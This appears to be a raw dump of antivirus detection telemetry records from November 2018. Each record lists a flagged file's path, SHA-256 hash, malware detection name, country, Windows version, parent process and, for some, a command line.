  Row(detection=Row(filename='avscan-20181102-053830-802f43a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053830-802F43A8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050648-12b65933', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050648-12B65933', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-155738-d23e1472', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155738-D23E1472', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155047-8cfdad8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155047-8CFDAD8C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:50:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T23:29:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6306390\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Baixaki_Windows Movie Maker_3348995344.exe', parentsize=2202824, timestamp='2018-11-01T00:58:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:27:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:51:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Docume~1\\\\\\\\AllUse~1\\\\\\\\Templates\\\\\\\\1.vbs\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-01T12:00:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160031-ef7eeb4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160031-EF7EEB4A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\C:\\Windows\\system32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:30:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-214451-cb97e904', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_632bd233\\AVSCAN-20181101-214038-A3F4827E\\AVSCAN-20181101-214451-CB97E904', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='171d1dfca3f708019564709e16775a3ddde7cd1778de81ca080281020af6a16d', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:44:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\1.vbs\\\\\\" ', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-01T09:06:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='surat dokter.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2016\\RPG\\ANALISA SURAT DOKTER\\SURAT DOKTER.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T06:02:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kuuls.exe', filepath='D:\\KUULS.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T12:26:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160121-f7c37ebf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160121-F7C37EBF', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:45:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-11-30-51.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-30T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T05:40:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T16:22:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fav.exe', filepath='D:\\Fav.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T14:35:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-125942-afc07066', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a6a30824\\AVSCAN-20181101-125933-AE28F57B\\AVSCAN-20181101-125942-AFC07066', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:59:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dance.exe', filepath='D:\\Dance.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T14:35:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sculpteouploader.exe', filepath='C:\\Program Files\\Pixologic\\ZBrush 4R8\\ZStartup\\ZPlugs64\\SculpteoData\\Uploader\\SculpteoUploader.exe', filesize=5000000, name='HEUR/AGEN.1028299.#M1.#R1'), hash='b6eec48c274983f3fd910068c1587c2491d810594440a0551dc5d9c577949d3b', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\新しいフォルダー\\Pixologic ZBrush 4R8 P2 (x64) + Crack - [CrackzSoft]\\Update\\ZBrush_4R8_P2_Updater.exe', parentsize=111780192, timestamp='2018-11-01T08:08:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-080719-7a9aa183', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_444c4ab4\\AVSCAN-20181101-075651-38978B97\\AVSCAN-20181101-080719-7A9AA183', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:07:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='libeay32.dll', filepath='f:\\new folder\\crazykart\\libeay32.dll', filesize=1024000, name='W32/Ramnit.C.#M1.#R1'), hash='83ffe90ba855aecdf5bfc2f21b2708fedd9bde7ea94f8ce25d6cf6abb563c12c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:34:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='admparse.dll', filepath='E:\\soft\\Essentials\\Internet Explorer 7 Final For Windows XP SP2 No WGA Check\\ADMPARSE.DLL', filesize=300000, name='W32/Ramnit.C.#M0.#R0'), hash='8ee5771d43b95c9c4f13e34591288c1c0276c3fa230f0ca8dfe4052e21adf583', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T03:15:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161300-f8bbb87f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_85699471\\AVSCAN-20181101-160404-9B7043B4\\AVSCAN-20181101-161300-F8BBB87F', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:13:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='videos.pif', filepath='C:\\Users\\X\\Videos\\Videos.pif', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215620-37bf7a66', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_632bd233\\AVSCAN-20181101-214038-A3F4827E\\AVSCAN-20181101-215620-37BF7A66', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='b645a4025ead0f408439c36803ba1b50df1e5a521cb505e70b2c960ac85bbb03', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:56:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='72a55fb04df96203c636a52aa2824c07558e785be34e646fe3749ee2a19eb26b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\72A55FB04DF96203C636A52AA2824C07558E785BE34E646FE3749EE2A19EB26B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='72a55fb04df96203c636a52aa2824c07558e785be34e646fe3749ee2a19eb26b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:25:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gccustomhook.exe', filepath='C:\\Program Files (x86)\\Common Files\\Adobe\\OOBE\\PDApp\\AdobeGCClient\\customhook\\gccustomhook.exe', filesize=1976000, name='W32/Sality.AT.#M1.#R1'), hash='712a5908ea66f2cd486d0fe6a8050096a6a75cd68d168788aeca5883f0a588b9', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:RIdwvh5s+kOFR+bY.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T21:55:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110903-ec0c9fd9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110903-EC0C9FD9', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:08:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dee59d61e821304e68c000f5bfd208c860220d3cb49193b00f2b0d6a2ca8568b.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\DEE59D61E821304E68C000F5BFD208C860220D3CB49193B00F2B0D6A2CA8568B.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='dee59d61e821304e68c000f5bfd208c860220d3cb49193b00f2b0d6a2ca8568b', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:15:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ehshell.exe', filepath='C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M0.#R0'), hash='99684bc2e499e7647453ae2adcf015c60014033ef8f54ad550b1b45ea2ffea80', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:01:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='7914e5b619e4d3e7025b498abde6e8d5bd5b716a0e9401148593e457b290b7ad', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='e5d9d6108bf064b5424c065fa6abeec72d5a0e0bfe1d9025f286f3ae4093898f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dllhost.exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\dllhost.exe', filesize=576000, name='TR/Patched.Gen.#M300.#R3374'), hash='6986d5ba98f2045982e0b194db81dcfd48b66fb5eb8088d76935846a6c9830e8', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:37:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-000923-043a17bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8a693d56\\AVSCAN-20181101-000803-D50C3FD5\\AVSCAN-20181101-000923-043A17BC', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T06:09:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xd_arbiter.htm', filepath='D:\\Books\\rrr\\Semester 9\\Data\\psi.agama\\2.perkembangan-agama-pada-usia-remaja-dan_files\\ifr_data\\about_data\\xd_arbiter.htm', filesize=292000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='d8f49d60d42ca5597da2d04d84bd61c98f2fbf5fea22e648e6bd5b24986b0a45', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Mozilla Firefox\\firefox.exe', parentsize=275568, timestamp='2018-11-01T01:17:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rossorabbitintrouble.exe', filepath='E:\\العاب\\جزرة الأرنوب\\RossoRabbitInTrouble.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='76ee4527b42e705ddd5a24dba7cb044d23dcdc20b51f8431f6071cff5bade2e3', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T21:38:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='odawmda2mda=.bat', filepath='C:\\Users\\X\\Thunder Network\\Mini_downloadlib\\ODAwMDA2MDA=\\ODAwMDA2MDA=.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:22:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pes2017.exe', filepath='I:\\P.2017\\PES2017.exe', filesize=110208000, name='W32/Virut.Gen.#M1.#R1'), hash='90c130054f3ad606b3be739b355f65f8485124f79f8f36c8e6b727c62ac7a5d3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T21:44:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e26dadab0222b19d7fda1be7a0f3401f7ca30cec62ae94127f99eb46b52aa5d4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\E26DADAB0222B19D7FDA1BE7A0F3401F7CA30CEC62AE94127F99EB46B52AA5D4', filesize=32000, name='TR/Crypt.XPACK.Gen7.#M300.#R601411'), hash='e26dadab0222b19d7fda1be7a0f3401f7ca30cec62ae94127f99eb46b52aa5d4', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:28:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T16:35:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00007fe0', filepath='C:\\Windows\\Temp\\c664208e-6774-4f41-91c9-c489393fdc8d\\tmp000003fa\\tmp00007fe0', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='18fdffefa9b4abbc2b9e7627a3f7488d29972a6d433110f6e898f56ec77ff2f9', metadata=Row(cmdline=None, country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-01T12:20:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T04:17:46Z'), dt=datetime.date(2018, 11, 1)),
